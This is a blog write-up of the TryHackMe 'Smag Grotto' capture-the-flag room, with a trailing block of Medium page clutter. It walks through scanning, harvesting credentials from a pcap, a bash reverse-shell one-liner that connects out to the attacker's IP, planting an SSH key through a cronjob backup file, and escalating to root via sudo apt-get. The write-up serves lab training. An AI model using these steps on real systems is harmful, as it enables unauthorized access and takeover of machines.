TryHackMe: Smag Grotto

Today we will take a look at TryHackMe: Smag Grotto. My goal in sharing this writeup is to show you the way if you are in trouble. Please try to understand each step and take notes.

Recon:

  • Network scan

Command: sudo nmap -sS -sC -sV -oN nmap/initial 10.10.240.21

  • Gobuster

Command: gobuster dir -u http://10.10.240.21 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 64

We found an directory here

Let’s check

We see a file with the .pcap extension. Let’s download and analyze.

We found the host, username and password in the file. Let’s go to the directory and enter.

Enumeration

I first did a ping check on the page that opened. Then I got a reverse shell.

Command: bash -c ‘bash -i >& /dev/tcp/IP/4242 0>&1’

As soon as I entered, I looked at my first job cronjob. As you can see the cronjob is taking the jake’s backup SSH public key and add it to the authorised keys, if we create our own key and modify the backup file we can access the server

Command: ssh-keygen -f jake

Let’s change the backup file on the server

Command: echo ‘key.pub’ > file

Now let’s enter

Command: ssh jake@IP -i key

Privilege Escalation

Let’s list the commands allowed by the command Sudo -l. Let’s privilege escalation with apt-get.

And now we are the root

“If you have any questions or comments, please do not hesitate to write. Have a good days”

--

--

--

Hello, my name is Elman. I am from Azerbaijan. I wish you a good days

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Announcing Superfluid Prizes for ETHDenver 2022 #BUIDLWEEK

Python Dictionary: Why accessing with [] is a bad idea

Service Outrage Announcement

My First Question in AWS Forum

GitHub Notifications is their most underrated feature

How to export and import stack output values in CDK?

Moral + Code = Code Your Morals

A Recap of My Software Engineering Immersive Experience at General Assembly — in 12 Tweets

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Al1z4deh:~# echo "Welcome"

Al1z4deh:~# echo "Welcome"

Hello, my name is Elman. I am from Azerbaijan. I wish you a good days

More from Medium

Tryhackme Git Happens

Set-Up docker for pen-testing

Secret — HackTheBox Write-up